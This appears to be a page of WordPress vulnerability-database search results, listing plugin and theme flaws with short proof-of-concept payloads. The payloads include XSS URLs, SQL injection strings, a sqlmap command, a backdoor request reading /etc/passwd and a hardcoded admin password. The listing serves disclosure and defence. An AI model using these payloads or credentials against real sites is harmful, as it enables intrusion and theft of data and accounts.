4359 matches found
Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The tidio-gallery WordPress plugin was affected by a Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="alert1;"...
defa-online-image-protector <= 3.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The defa-online-image-protector WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/defa-online-image-protector/redirect.php?r="alert1;"...
AJAX Random Post <= 2.00 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The ajax-random-post WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/ajax-random-post/js.php?interval="alert1;"...
Stop User Enumeration <= 1.3.3 - Username Enumeration Bypass
Using the plugin "Stop User Enumeration 1.3.3" is possible bypass it to get the usernames. Blocked: http://www.example.com/?author%00=%001 Passed: http://www.example.com/?bypass=1&author%00=1...
wp-championship <= 5.8 - Authenticated Blind SQL Injection
The wp-championship WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. $ sqlmap -u 'http://www.example.com/wp-admin/wp-championship/csadminusers.php&userid=' --data="isadmin=1&user" --cookie=AUTHCOOKIEHERE --level=5 --risk=3...
Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload
The code in csv2wpecCouponFileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for "; $uploadfile="/var/www/s.pht"; $ch =...
StageShow <= 5.0.8 - Open Redirect
The StageShow WordPress plugin was affected by an Open Redirect security vulnerability. http://www.example.com/wp-content/plugins/stageshow/stageshowredirect.php?url=http%3A%2F%2F2buntu.com...
SE HTML5 Album Audio Player <= 1.1.0 - Local File Include
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a local file include vulnerability. The downloadaudio.php file does not check to see if the user is authenticated, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../...
PowerPress Podcasting < 6.0.1 - Cross-Site Scripting (XSS)
The PowerPress Podcasting plugin by Blubrry WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. /wp-admin/admin.php?page=powerpress/powerpressadmincategoryfeeds.php&action=powerpress-editcategoryfeed&cat=1';"--alert0x014068...
slidedeck2 < 2.1.20130313 - XSS in ZeroClipboard
The SlideDeck 2 Lite Responsive Content Slider WordPress plugin was affected by a XSS in ZeroClipboard security vulnerability. /wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id="catcheif!self.aself.a=!alertdocument.cookie//&width&height...
Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability...
Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E...
WP DB Error Manager <= 2.1.6 - Reflected Cross-Site Scripting (XSS)
Reflected XSS in the file "admin/partials/wp-db-error-manager-login-display.php" in parameter "email" query string https://example.com/wp-content/plugins/wp-database-error-manager/admin/partials/wp-db-error-manager-login-display.php?email=%22%3E%3Cimg%20src%20onerror=alert/XSS/%3E...
Love Travel < 2.0 - Unauthenticated Reflected XSS & XFS
An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the Love Travel theme for WordPress, affected versions: 1.0-1.9. Vulnerable parameters: ndtravelarchiveformkeyword, ndtraveltypologyslug. The issue was fixed due to a code rewrite of the theme. $ :: Payloads: " "...
Bulk Change <= 1.0 - Authenticated Reflected Cross-Site Scripting
The Bulk Change page under Tools Bulk Posts Change has an 's' GET parameter echoed to a text input tag value without being sanitised, leading to a cross-site scripting issue. /wp-admin/tools.php?page=bulk-change%2Fbulk-change.php&perpage=10&dosearch=Search+...&changeposttype&bctpaction&s="alertXS...
Careerfy < 4.3.0 - Unauthenticated Reflected Cross-Site Scripting
An Unauthenticated Reflected XSS vulnerability was discovered in the Careerfy Job Board theme v4.2.0 for WordPress. https://careerfy.net/careerbooster/jobs-listing/?jobtype=%3Cimg%20src=x%20onerror=alertXSS;%3E...
Workio – Job Board < 1.0.3 - Unauthenticated Reflected XSS
Unauthenticated Reflected XSS vulnerability was discovered in the «Workio – Job Board WordPress Theme», tested version — v1.0.1. https://www.demoapus-wp1.com/workio/jobs-grid-v1/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alertXSS%3E...
SportsPress < 2.7.2 - Authenticated Stored Cross-Site Scripting
Any user with the role of administrator or League Manager is able to store XSS payloads in the custom delimiter setting of events pages. This will then execute on all events pages on the website. Video PoC: https://youtu.be/J8QZ8S6CiS8...
Elementor Page Builder < 2.9.10 - Authenticated Stored XSS
The Elementor Page Builder plugin is susceptible to stored XSS. An author user can create custom links containing XSS payloads or apply custom attributes to widgets which results in XSS. javascript:alert1, JaVaScript:alert1, javas cript:alert1 @keyframes x...
wpForo < 1.7.0 - Reflected Cross-Site Scripting (XSS) via s Parameter
The plugin did not escape, validate or escape the 's' GET parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in admin https://example.com/wp-admin/admin.php?page=wpforo-phrases&s="alert/XSS/...
Simple File List < 4.2.3 - Unauthenticated Arbitrary File Upload RCE
The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move rename the png file to a...
Tickera WordPress Event Ticketing < 3.4.6.9 - Unauthenticated Sensitive Data Exposure
Due to missing authorization controls in the "admininit" hooks, all personal data from registered users of an event could be exported into a downloadable PDF file by every unauthenticated user. The event ID could be read from the page source and/or easily enumerated in sequence. According to the...
Chained Quiz < 1.1.9.1 - Authenticated Stored XSS
WordPress Plugin Plugin Chained Quiz latest 1.1.9 and before suffers from a Stored XSS vulnerability in the sendername, adminsubject and usersubject POST parameter when an admin completes the setting for plugin as a result, the severity is very low POST /wp-admin/admin.php?page=chainedquizoptions...
Seo By Rank Math <= 1.0.27 - Authenticated Settings Reset
Allows any authenticated user with a role as low as subscriber to reset Settings of the plugin. https://plugins.trac.wordpress.org/browser/seo-by-rank-math/tags/1.0.27/includes/admin/class-options.phpL91...
Slick Popup <= 1.7.1 - Privilege Escalation
Subscriber users are able to create an administrator account with hardcoded login credentials. Hardcoded username "slickpopupteam" and its password is OmakPass13...
FV Flowplayer Video Player <= 7.3.13.727 - Unauthenticated Stored XSS
The vulnerable function is exposed to unauthenticated users over wpajaxnoprivfvwpflowplayeremailsignup ajax hook. It saves anything that user provides in email POST parameter. Send POST request to wp-admin/admin-ajax.php with body content: "action=fvwpflowplayeremailsignup&list=1&[email protected]"...
Calendar <= 1.3.10 - Authenticated Stored Cross-Site Scripting (XSS)
This WordPress plugin allows remote authenticated users, without the unfilteredhtml capability, to execute JavaScript code through stored XSS attack. The plugin by default is available to users with contributor or more privileges. POC 1 You can inject JavaScript code into the event title when...
UK Cookie Consent <= 2.3.9 - Authenticated Stored Cross-Site Scripting (XSS)
A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser. Tested on version 2.3.9 older versions may also be affected 1 Access WordPress control panel. 2...
Category Order and Taxonomy Terms Order <= 1.5.2.2 - Authenticated PHP Object Injection
Usage of unserialize on user input in the saving request of the orders leads to PHP object injection vulnerability. Send POST request to "URL/wp-admin/admin-ajax.php" with parameters "action=update-taxonomy-order&order=SERIALIZED-OBJECT"...
Clean Login <= 1.7.12 - Change Redirect URL CSRF
The Clean Login WordPress plugin was affected by a Change Redirect URL CSRF security vulnerability...
Xtreme Locator Dealer Locator Plugin 1.5 – Authenticated SQL Injection
Type user access: admins user. $GET‘id’ is not escaped. Is accessible for only admins user. 1 - logged with admin user; 2 - send resquest get; http://www.example.com/wp-admin/admin.php?page=xtreme-locator-settings&id=0+UNION+ALL+SELECT+1%2Cslug%2Cname%2C4%2C5+FROM+wpterms+WHERE+termid%3D1...
ZX_CSV Upload 1 – Authenticated SQL Injection
Type user access: admin user. $GET‘id’ is not escaped. URL is accessible for every registered user. 1 – Login with admin user. 2 - Send request post:...
404 to 301 <= 2.3.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
Description There is a stored XSS in the 404-to-301 WP plugin alertdocument.cookie HTTP/1.1 Host: wordpress Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/537.36 KHTML, like Gecko Chrome/51.0.2704.103 Safari/537.36 Accept:...
CYSTEME Finder <= 1.3 - Unauthenticated LFI and Unauthenticated File Upload
CYSTEME does not properly check SESSION Cookies allowing a remote attacker to upload, view, or delete files from any location on the remote file system. - Retrieve all data in the root wordpress directory. This will return JSON. Exploit:...
Tera Charts 1.0 - Unauthenticated Cross-Site Scripting (XSS)
The tera-charts WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://www.example.com/tera-charts/charts/treemap.php?fn=";alert1;"&userid=1...
anti-plagiarism <= 3.60 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The anti-plagiarism WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/anti-plagiarism/js.php?m="alert1;"...
HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The hdw-tube WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/hdw-tube/playlist.php?playlist="alert1;alert1;"...
MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/parsi-font/css.php?size="alert1;"...
New Year Firework <= 1.1.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The new-year-firework WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/new-year-firework/firework/index.php?text="alert1;"...
InstaLinker <= 1.1.1 - Reflected Cross-Site Scripting (XSS)
Due to a lack of input sanitization in the includes/instalinker-admin-preview.php file, it is possible to utilise a reflected XSS vector to run a script in the target user's browser and potentially compromise the WordPress installation...
Ajax Load More <= 2.8.1.1 - Authenticated File Upload & Deletion
Authenticated file upload in file ajax-load-more/admin/admin.php file, in the function almsaverepeater. The variable $f is set to a predictable PHP file path, and then the content of the variable $c is written into that file. The following code proves that this second variable is also set from...
MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
Plugin is still affected and has been closed. Typical local file inclusion vulnerability: from downloadpage.php: I've tried to get RCE but didn't have success reading from /proc/self/environ or /var/log/apache2/access.log include: Failed opening '/proc/self/environ' for inclusion...
WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The wp-symposium WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/wp-symposium/getalbumitem.php?size=alert/xss/...
MP3-jPlayer <= 2.4.2 - Full Path Disclosure
The download.php code allows arbitrary users to disclose path information on WordPress sites with this plugin installed. 120 $info = " 121 Get: " . $mp3 . " 122 Sent: " . $sent . " 123 File: " . $file . " 124 Open: " . $SERVER'DOCUMENTROOT' . $fp . " 125 Root: " . $rooturl . " 126 pID: "...
Ultimate Member 1.2.98-1.2.994 - Reflected Cross-Site Scripting (XSS)
The Ultimate Member plugin utilizes the Redux Framework. The Redux Framework includes a script named ‘class.p.php’, which acts as a HTTP proxy. Utilizing this script, it is possible to trigger a Reflected XSS attack, by loading data from a location controlled by the attacker. The data from this...
Freshmail for WordPress <= 1.5.8 - shortcode.php SQL Injection
There is a SQL Injection vulnerability available for collaborators or higher privileged users for webs with freshmail plugin installed. The SQL Injection is located in the attribute "id" of the inserted shortcode FMform id="N". The shortcode attribute "id" is not sanitized before inserting it in ...
Crayon Syntax Highlighter <= 2.6.10 - Local File Disclosure
The local file syntax highlighting feature of Crayon Syntax Highlighter doesn't check the path of the file to process. Also, by default, this feature is usable through public comments. This allows unauthenticated visitors to see the content of any file where the web server has read permissions,...
WordPress 2.1.1 - Command Execution Backdoor
http://www.example.com/wp-includes/feed.php?ix=phpinfo; http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd...
Podcast Channels < 0.28 - Unauthenticated Reflected XSS
The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. http://127.0.0.1/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...
WP e-Commerce Swipe <= 3.1.0 - Multiple XSS Issues
The last time it was checked the plugin was still affected and had been closed...